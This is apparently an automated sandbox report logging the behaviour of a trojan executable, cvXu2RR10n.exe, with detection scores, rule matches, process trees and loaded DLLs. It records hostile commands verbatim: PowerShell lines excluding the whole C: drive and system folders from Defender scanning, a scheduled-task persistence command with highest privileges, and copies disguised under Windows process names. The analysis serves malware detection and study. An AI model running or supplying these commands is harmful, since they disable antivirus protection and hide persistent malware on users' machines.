Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.000000000352D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUserPingCounter.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1329052019.000000000352D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVPNGrabber.dclib4 vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe, 00000000.00000002.1364796894.000000001333D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs cvXu2RR10n.exe
Source: cvXu2RR10n.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs cvXu2RR10n.exe

Source: cvXu2RR10n.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.cvXu2RR10n.exe.3454e20.23.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
Source: 50.2.ApplicationFrameHost.exe.34069c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names

Source: vAJjQbsDlJtvByBkfqttADkNAptf.exe, 00000012.00000002.1885871975.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBP

Source: classification engine

Classification label: mal100.troj.evad.winEXE@54/75@1/2

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

File created: C:\Users\user\Music\ApplicationFrameHost.exe

Jump to behavior

Source: C:\Users\user\Music\ApplicationFrameHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\8ad8d4919e185969be6833957426f23e0f0b8df6
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Mutant created: NULL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yb53p1jo.oyd.ps1

Jump to behavior

Source: C:\Users\user\Music\ApplicationFrameHost.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs"

Source: cvXu2RR10n.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: cvXu2RR10n.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Music\ApplicationFrameHost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cvXu2RR10n.exe	Virustotal: Detection: 67%
Source: cvXu2RR10n.exe	ReversingLabs: Detection: 78%

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

File read: C:\Users\user\Desktop\cvXu2RR10n.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\cvXu2RR10n.exe "C:\Users\user\Desktop\cvXu2RR10n.exe"
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vAJjQbsDlJtvByBkfqttADkNAptf" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Users\user\Music\ApplicationFrameHost.exe C:\Users\user\Music\ApplicationFrameHost.exe
Source: unknown	Process created: C:\Users\user\Music\ApplicationFrameHost.exe C:\Users\user\Music\ApplicationFrameHost.exe
Source: unknown	Process created: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe
Source: unknown	Process created: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Users\user\Music\ApplicationFrameHost.exe "C:\Users\user\Music\ApplicationFrameHost.exe"
Source: unknown	Process created: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe
Source: unknown	Process created: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe
Source: unknown	Process created: C:\Recovery\smartscreen.exe C:\Recovery\smartscreen.exe
Source: unknown	Process created: C:\Recovery\smartscreen.exe C:\Recovery\smartscreen.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\Music\ApplicationFrameHost.exe "C:\Users\user\Music\ApplicationFrameHost.exe"
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs"
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4df10f3f-bad6-4e3d-936c-dcca7df15912.vbs"
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vAJjQbsDlJtvByBkfqttADkNAptf" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Users\user\Music\ApplicationFrameHost.exe "C:\Users\user\Music\ApplicationFrameHost.exe"	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs"
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4df10f3f-bad6-4e3d-936c-dcca7df15912.vbs"

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
